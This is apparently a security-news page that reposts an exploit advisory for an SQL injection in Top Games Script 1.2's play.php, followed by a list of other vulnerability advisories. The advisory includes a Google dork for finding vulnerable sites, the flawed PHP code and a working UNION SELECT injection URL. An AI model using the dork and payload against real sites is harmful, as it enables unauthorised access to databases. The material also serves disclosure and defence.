The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
06/24/2013

Top Games Script 1.2 (play.php, gid param) - SQL Injection Vulnerability

TopGamesScript-v1.2 (play.php) Sql Injection Vulnerability
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         :
http://sourceforge.net/projects/gamesscript/files/latest/download?source=directory
.:. Dork           : inurl:"play.php?gid=" "Powered By TopGames.ws"
####################################################################

######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################

/play.php (LINE: 4-19)

-----------------------------------------------------------------------------
$gameID= $_GET['gid'];

$con = mysql_connect($dbserver,$dbuser,$dbpassword);
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

mysql_select_db($dbname, $con);

$sqlselect="SELECT * FROM games WHERE gameid=" . $gameID;
$result = mysql_query($sqlselect);

$row = mysql_fetch_array($result);
$gwidth =  $row['width'];
$gheight = $row['height'];

-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

http://localhost/TopGamesScript/play.php?gid=null and 1=2 UNION SELECT
1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23


####################################################################

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015